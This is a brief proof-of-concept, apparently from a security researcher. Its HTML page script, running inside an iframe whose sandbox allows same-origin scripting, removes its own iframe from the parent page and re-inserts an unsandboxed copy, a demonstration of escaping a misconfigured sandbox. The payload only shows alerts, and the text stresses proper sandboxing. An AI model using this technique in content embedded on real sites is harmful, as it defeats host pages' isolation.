This proof-of-concept demonstrates how an iframe can be dynamically manipulated and replaced from within, but it does not bypass browser security restrictions.
The technique shown here only works if the iframe is not strictly sandboxed—specifically, if it has the allow-same-origin and allow-scripts permissions, or if it is not sandboxed at all.
If the iframe is sandboxed without these permissions, browser security policies will prevent the script from accessing or modifying the parent document, and this code will not work.
POC for manipulating iframes
Below is a demonstration of how a script running inside an iframe can find and replace itself in the parent document, if the browser's sandbox restrictions are not enforced or are misconfigured. This is not a universal sandbox escape, but it does show why careful sandboxing is important.
<!DOCTYPE html>
<html>
<head>
<title>PoC - iframe sandbox breakout</title>
</head>
<body>
<script>
const escape = () => {
document.body.innerText = "poc iframe sandbox breakout.";
let parent = window.parent;
// Find the iframe that contains this window
let container = Array.from(parent.document.getElementsByTagName('iframe'))
.find(iframe => iframe.contentWindow === window);
if (container) {
let replacement = parent.document.createElement("iframe");
replacement.setAttribute("src", window.location.href);
replacement.setAttribute("id", "escapedTheIframe")
parent.document.body.append(replacement);
container.parentNode.removeChild(container);
parent.alert("broke out of the iframe sandbox poc - ian");
}
else {
alert("Could not find the containing iframe - ian");
}
}
escape();
</script>
</body>
</html>Image PoC
